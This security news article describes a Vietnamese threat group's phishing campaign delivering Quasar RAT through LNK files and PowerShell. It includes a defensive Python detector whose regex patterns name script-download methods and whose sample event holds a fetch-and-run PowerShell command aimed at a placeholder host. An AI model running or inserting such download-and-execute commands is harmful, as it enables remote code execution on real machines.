CyberSecurity SEE

Vietnamese Multi-Stage Malware Attack On Marketers

A recent discovery by the Cyble Research and Intelligence Lab (CRIL) has revealed a sophisticated multi-stage malware attack orchestrated by a Vietnamese threat actor, targeting job seekers and digital marketing professionals. The campaign uses advanced tactics and tools, such as Quasar RAT, to gain full control over compromised systems.

The attack begins with spam emails containing phishing attachments, enticing recipients to open an archive file posing as a PDF document. Once the LNK file is executed, PowerShell commands download obfuscated scripts from external sources to evade detection in non-virtualized environments.
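A defender-side illustration of the delivery step above, added here and not taken from the CRIL report: it triages process-creation events (Sysmon Event ID 1 style fields) for a PowerShell process started from Explorer that fetches or decodes a script. The field names, sample events, hosts and agent path are constructed assumptions, and it assumes the shortcut targets PowerShell directly.

```python
import re

SHELLS = ("\\powershell.exe", "\\pwsh.exe")
# Command-line tokens for fetching a script, running an encoded blob, hiding the window.
FETCH = re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
ENCODED = re.compile(r"\s-(e|ec|en\w*)\s", re.I)
HIDDEN = re.compile(r"\s-w\w*\s+(hidden|1)\b", re.I)
# Temp folders Explorer, 7-Zip and WinRAR create when a file is opened from inside an archive.
ARCHIVE_DIR = re.compile(r"\\temp\\(temp\d+_[^\\]+\.zip|7z[^\\]+|rar\$[^\\]+)", re.I)

def triage(ev):
    """Return the signals a process-creation event shares with the chain described above."""
    if not ev["Image"].lower().endswith(SHELLS):
        return []
    cmd, reasons = ev.get("CommandLine", ""), []
    if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
        reasons.append("shell_started_from_explorer")  # how a double-clicked LNK appears
    if FETCH.search(cmd):
        reasons.append("remote_fetch")
    if ENCODED.search(cmd):
        reasons.append("encoded_command")
    if HIDDEN.search(cmd):
        reasons.append("hidden_window")
    # Supporting signal only; assumes the logged working directory is the extraction folder.
    if ARCHIVE_DIR.search(ev.get("CurrentDirectory", "")):
        reasons.append("cwd_inside_extracted_archive")
    return reasons

def is_alert(ev):
    """Alert when a user-launched shell also fetches or decodes its script."""
    r = triage(ev)
    return "shell_started_from_explorer" in r and bool({"remote_fetch", "encoded_command"} & set(r))

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed events; hosts, paths and the agent name are placeholders.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CurrentDirectory": r"C:\Users\alice\AppData\Local\Temp\Temp1_JobOffer.zip",
     "CommandLine": "powershell.exe -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/stage.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CurrentDirectory": r"C:\Users\alice", "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Program Files\ExampleAgent\agent.exe", "Image": PS,
     "CurrentDirectory": r"C:\Windows\System32",
     "CommandLine": "powershell.exe -NoProfile -Command \"Invoke-WebRequest "
                    "https://example.invalid/inventory.json -OutFile inv.json\""},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(is_alert(ev), triage(ev))
```

A shortcut that starts PowerShell through an intermediate process such as cmd.exe will not show Explorer as the parent, so the parent check would need to walk one level further up the process tree in that case.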

Upon verifying a clean environment, the attackers decrypt the payload using hardcoded keys, activating Quasar RAT to exfiltrate data and potentially deploy additional malware. The Vietnamese threat actor expanded their operations in July 2022, targeting digital marketing professionals with Ducktail malware and incorporating various types of malware and Malware-as-a-Service (MaaS) frameworks for scalability. This campaign is attributed to a Vietnamese threat group based on target selection, attack tools, and payload delivery.

The malware employs evasion techniques to avoid detection in virtual environments, using checks to identify sandboxed environments and triggering exceptions if detected. It then decrypts encoded strings and escalates privileges to ensure persistence in the infected system. The malware further evades detection by modifying key Windows functions, disabling event tracing, and encrypting sensitive data.

The final stage involves the deployment of Quasar RAT, adapted to reduce detectability and enable data theft and remote system control. Configured with specific parameters to avoid attribution and detection, Quasar RAT allows the threat group to operate with more anonymity.

Overall, this sophisticated multi-stage malware attack highlights the evolving tactics employed by cybercriminals to target job seekers and professionals in specific industries, emphasizing the importance of robust cybersecurity measures to defend against such threats. As cybersecurity experts continue to analyze and combat these malicious campaigns, vigilance and proactive defense strategies are crucial to safeguarding sensitive data and systems from cyber threats.
